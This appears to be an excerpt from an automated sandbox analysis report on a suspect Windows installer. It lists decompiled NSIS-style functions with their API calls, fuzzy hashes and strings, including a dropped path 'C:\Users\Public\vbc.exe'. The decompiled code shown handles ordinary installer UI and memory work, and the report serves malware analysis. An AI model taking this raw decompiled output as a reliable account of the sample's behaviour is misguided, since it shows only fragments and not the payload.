                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed4fa0f0c30c7b53ad78e8b0043dcb3c9171a2687b7b9660ccfab6c309ae07b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E417B71908305DFD3128F299844B2AB7F9FB40327F90C95EF586CA142D7309955CFA2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00406528(CHAR* _a4) {
                                                                                                                                                                                                          				char _t5;
                                                                                                                                                                                                          				char _t7;
                                                                                                                                                                                                          				char* _t15;
                                                                                                                                                                                                          				char* _t16;
                                                                                                                                                                                                          				CHAR* _t17;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t17 = _a4;
                                                                                                                                                                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                                                                                                          					_t17 =  &(_t17[4]);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *_t17 != 0 && E00405C52(_t17) != 0) {
                                                                                                                                                                                                          					_t17 =  &(_t17[2]);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t5 =  *_t17;
                                                                                                                                                                                                          				_t15 = _t17;
                                                                                                                                                                                                          				_t16 = _t17;
                                                                                                                                                                                                          				if(_t5 != 0) {
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
                                                                                                                                                                                                          							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                                                                                                          							_t16 = CharNextA(_t16);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t17 = CharNextA(_t17);
                                                                                                                                                                                                          						_t5 =  *_t17;
                                                                                                                                                                                                          					} while (_t5 != 0);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t16 = CharPrevA(_t15, _t16);
                                                                                                                                                                                                          					_t7 =  *_t16;
                                                                                                                                                                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                                                          					if(_t15 < _t16) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 589700163-1374994687
                                                                                                                                                                                                          • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                                                                                                          • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                                                                                                          				long _t39;
                                                                                                                                                                                                          				long _t41;
                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                          				signed char _t50;
                                                                                                                                                                                                          				long* _t54;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                                                                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t50 = _t54[5];
                                                                                                                                                                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                                                                                                          						goto L18;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t39 =  *_t54;
                                                                                                                                                                                                          					if((_t50 & 0x00000002) != 0) {
                                                                                                                                                                                                          						_t39 = GetSysColor(_t39);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                                                                                                          						SetTextColor(_a8, _t39);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					SetBkMode(_a8, _t54[4]);
                                                                                                                                                                                                          					_t41 = _t54[1];
                                                                                                                                                                                                          					_v16.lbColor = _t41;
                                                                                                                                                                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                                                                                                          						_t41 = GetSysColor(_t41);
                                                                                                                                                                                                          						_v16.lbColor = _t41;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                                                                                                          						SetBkColor(_a8, _t41);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                                                                                                          						_v16.lbStyle = _t54[2];
                                                                                                                                                                                                          						_t44 = _t54[3];
                                                                                                                                                                                                          						if(_t44 != 0) {
                                                                                                                                                                                                          							DeleteObject(_t44);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t54[3];
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}










                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                                                                          • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E72E324D8(intOrPtr* _a4) {
                                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                                          				int _v84;
                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                          				short _v92;
                                                                                                                                                                                                          				intOrPtr* _t28;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                          				intOrPtr _t45;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t44 = E72E31215();
                                                                                                                                                                                                          				_t28 = _a4;
                                                                                                                                                                                                          				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                                                                                                                                                                                          				_v88 = _t45;
                                                                                                                                                                                                          				_t48 = (_t45 + 0x41 << 5) + _t28;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t43 =  *(_t48 - 8) & 0x000000ff;
                                                                                                                                                                                                          					if(_t43 <= 7) {
                                                                                                                                                                                                          						switch( *((intOrPtr*)(_t43 * 4 +  &M72E32626))) {
                                                                                                                                                                                                          							case 0:
                                                                                                                                                                                                          								 *_t44 = 0;
                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                          							case 1:
                                                                                                                                                                                                          								__eax =  *__eax;
                                                                                                                                                                                                          								if(__ecx > __ebx) {
                                                                                                                                                                                                          									_v84 = __ecx;
                                                                                                                                                                                                          									__ecx =  *(0x72e3307c + __edx * 4);
                                                                                                                                                                                                          									__edx = _v84;
                                                                                                                                                                                                          									__ecx = __ecx * __edx;
                                                                                                                                                                                                          									asm("sbb edx, edx");
                                                                                                                                                                                                          									__edx = __edx & __ecx;
                                                                                                                                                                                                          									__eax = __eax &  *(0x72e3309c + __edx * 4);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_push(__eax);
                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                          							case 2:
                                                                                                                                                                                                          								__eax = E72E31429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                          							case 3:
                                                                                                                                                                                                          								__eax = lstrcpynA(__edi,  *__eax,  *0x72e3405c);
                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                          							case 4:
                                                                                                                                                                                                          								__ecx =  *0x72e3405c;
                                                                                                                                                                                                          								__edx = __ecx - 1;
                                                                                                                                                                                                          								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                                                                                                                                                                          								__eax =  *0x72e3405c;
                                                                                                                                                                                                          								 *((char*)(__eax + __edi - 1)) = __bl;
                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                          							case 5:
                                                                                                                                                                                                          								__ecx =  &_v80;
                                                                                                                                                                                                          								_push(0x27);
                                                                                                                                                                                                          								_push(__ecx);
                                                                                                                                                                                                          								_push( *__eax);
                                                                                                                                                                                                          								__imp__StringFromGUID2();
                                                                                                                                                                                                          								__eax =  &_v92;
                                                                                                                                                                                                          								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x72e3405c, __ebx, __ebx);
                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                          							case 6:
                                                                                                                                                                                                          								_push( *__esi);
                                                                                                                                                                                                          								L15:
                                                                                                                                                                                                          								__eax = wsprintfA(__edi, 0x72e34000);
                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                          								__esp = __esp + 0xc;
                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                          					_t30 =  *(_t48 + 0x14);
                                                                                                                                                                                                          					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                                                                                                                                                                                          						GlobalFree(_t30);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                                                                                                                                                                                          					if(_t31 != 0) {
                                                                                                                                                                                                          						if(_t31 != 0xffffffff) {
                                                                                                                                                                                                          							if(_t31 > 0) {
                                                                                                                                                                                                          								E72E312D1(_t31 - 1, _t44);
                                                                                                                                                                                                          								goto L26;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E72E31266(_t44);
                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v88 = _v88 - 1;
                                                                                                                                                                                                          					_t48 = _t48 - 0x20;
                                                                                                                                                                                                          				} while (_v88 >= 0);
                                                                                                                                                                                                          				return GlobalFree(_t44);
                                                                                                                                                                                                          			}















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 72E31215: GlobalAlloc.KERNEL32(00000040,72E31233,?,72E312CF,-72E3404B,72E311AB,-000000A0), ref: 72E3121D
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E325DE
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E32618
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                          • Opcode ID: 9c94593cc379b04c299d037a44d3b706daa52f8e7566c70e8ee19004d99b45a1
                                                                                                                                                                                                          • Instruction ID: 9777790b03758c57251f235227cfc8f5fe57068452d5304f714e56acc3294259
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c94593cc379b04c299d037a44d3b706daa52f8e7566c70e8ee19004d99b45a1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A641BF77508204EFD3038F58DCA4D2A7BBEEB85306B90896DF58186152D7319E54DF62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405374(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                          				struct HWND__* _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				CHAR* _v32;
                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				CHAR* _t26;
                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                          				CHAR* _t28;
                                                                                                                                                                                                          				long _t29;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t26 =  *0x42ec24; // 0x0
                                                                                                                                                                                                          				_v8 = _t26;
                                                                                                                                                                                                          				if(_t26 != 0) {
                                                                                                                                                                                                          					_t27 =  *0x42f514;
                                                                                                                                                                                                          					_v12 = _t27;
                                                                                                                                                                                                          					_t39 = _t27 & 0x00000001;
                                                                                                                                                                                                          					if(_t39 == 0) {
                                                                                                                                                                                                          						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t26 = lstrlenA(0x42a098);
                                                                                                                                                                                                          					_a4 = _t26;
                                                                                                                                                                                                          					if(_a8 == 0) {
                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                          						if((_v12 & 0x00000004) == 0) {
                                                                                                                                                                                                          							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if((_v12 & 0x00000002) == 0) {
                                                                                                                                                                                                          							_v32 = 0x42a098;
                                                                                                                                                                                                          							_v52 = 1;
                                                                                                                                                                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                                                                                                                          							_v44 = 0;
                                                                                                                                                                                                          							_v48 = _t29 - _t39;
                                                                                                                                                                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                                                                                                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t39 != 0) {
                                                                                                                                                                                                          							_t28 = _a4;
                                                                                                                                                                                                          							 *((char*)(_t28 + 0x42a098)) = 0;
                                                                                                                                                                                                          							return _t28;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                                                                                                          						if(_t26 < 0x800) {
                                                                                                                                                                                                          							_t26 = lstrcatA(0x42a098, _a8);
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t26;
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                          • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405430
Memory Dump Source
• Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                          • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                                                                                                                                          • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00402E52(intOrPtr _a4) {
                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                          				long _t6;
                                                                                                                                                                                                          				struct HWND__* _t7;
                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                          					_t15 =  *0x42946c;
                                                                                                                                                                                                          					if(_t15 != 0) {
                                                                                                                                                                                                          						_t15 = DestroyWindow(_t15);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x42946c = 0;
                                                                                                                                                                                                          					return _t15;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *0x42946c != 0) {
                                                                                                                                                                                                          					return E00406692(0);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t6 = GetTickCount();
                                                                                                                                                                                                          				if(_t6 >  *0x42f450) {
                                                                                                                                                                                                          					if( *0x42f448 == 0) {
                                                                                                                                                                                                          						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
                                                                                                                                                                                                          						 *0x42946c = _t7;
                                                                                                                                                                                                          						return ShowWindow(_t7, 5);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(( *0x42f514 & 0x00000001) != 0) {
                                                                                                                                                                                                          						wsprintfA( &_v68, "... %d%%", E00402E36());
                                                                                                                                                                                                          						return E00405374(0,  &_v68);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t6;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00402E6A
                                                                                                                                                                                                          • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040306E), ref: 00402E88
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402EB6
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                                                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                                                                                                                                            • Part of subcall function 00402E36: MulDiv.KERNEL32 ref: 00402E4B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                                                                                                          • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                                                                                                                                          • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                          				signed char _v12;
                                                                                                                                                                                                          				unsigned int _v16;
                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                          				void* _v60;
                                                                                                                                                                                                          				long _t15;
                                                                                                                                                                                                          				unsigned int _t19;
                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                          				struct HWND__* _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t28 = _a4;
                                                                                                                                                                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                                                                                                          				if(_a8 == 0) {
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					_v56 = _t15;
                                                                                                                                                                                                          					_v60 = 4;
                                                                                                                                                                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                                                                                                          					return _v24;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t19 = GetMessagePos();
                                                                                                                                                                                                          				_v16 = _t19 >> 0x10;
                                                                                                                                                                                                          				_v20 = _t19;
                                                                                                                                                                                                          				ScreenToClient(_t28,  &_v20);
                                                                                                                                                                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                                                                                                          				if((_v12 & 0x00000066) != 0) {
                                                                                                                                                                                                          					_t15 = _v8;
                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t25 | 0xffffffff;
                                                                                                                                                                                                          			}















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                                                          • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				CHAR* _t19;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if(_a8 == 0x110) {
                                                                                                                                                                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                                                                                          					_a8 = 0x113;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a8 == 0x113) {
                                                                                                                                                                                                          					_t11 = E00402E36();
                                                                                                                                                                                                          					_t19 = "unpacking data: %d%%";
                                                                                                                                                                                                          					if( *0x42f454 == 0) {
                                                                                                                                                                                                          						_t19 = "verifying installer: %d%%";
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					wsprintfA( &_v68, _t19, _t11);
                                                                                                                                                                                                          					SetWindowTextA(_a4,  &_v68);
                                                                                                                                                                                                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          APIs
